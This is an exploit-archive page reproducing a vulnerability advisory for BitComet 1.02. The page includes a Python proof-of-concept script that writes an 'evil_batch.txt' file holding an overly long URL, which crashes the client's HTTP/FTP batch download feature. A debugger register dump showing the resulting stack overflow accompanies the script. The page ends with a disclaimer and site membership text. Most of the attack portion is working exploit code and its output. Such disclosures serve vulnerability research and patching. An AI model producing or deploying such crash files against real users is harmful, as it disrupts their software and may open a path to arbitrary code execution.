source: http://www.securityfocus.com/bid/30255/info BitComet is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the application. Given the nature of this vulnerability, the attacker may also be able to execute arbitrary code, but this has not been confirmed. BitComet 1.02 is vulnerable; other versions may also be affected. #!/usr/bin/python # BitComet 1.02 [HTTP/FTP Batch Download] url DOS #This python script will generate an evil_batch.txt file that when #loaded into bitcomet for batch downloading it will result in a crash. #The vulnerability resides in failure to handle overly long urls. #(File->HTTP/FTP Batch Download->Import URL from file->OK) #Debug output: # ---------------------------------------------------------------- # Exception C00000FD (STACK_OVERFLOW) # ---------------------------------------------------------------- # EAX=00032000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 # EBX=06E90020: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 # ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? # EDX=7C90EB94: C3 8D A4 24 00 00 00 00-8D 64 24 00 90 90 90 90 # ESP=0012B354: 66 9A 80 7C 5C 85 57 00-5C F9 B1 00 00 F0 5F 01 # EBP=0012B380: 04 B4 12 00 83 8B 57 00-20 00 E9 06 50 00 00 00 # ESI=015FF000: 14 CB 99 00 E4 05 00 00-06 00 00 00 3F 00 00 00 # EDI=001E8482: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 # EIP=00707E07: 85 00 EB E9 55 8B EC 51-53 56 8B F0 33 DB 3B F3 # --> TEST [EAX],EAX # ---------------------------------------------------------------- # # #Found by: Shinnok raydenxy [at] yahoo dot com batch = 'http://' badstr = 'A' * 1000000 batch += badstr f = open('evil_batch.txt','wb') f.write(batch); f.close
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论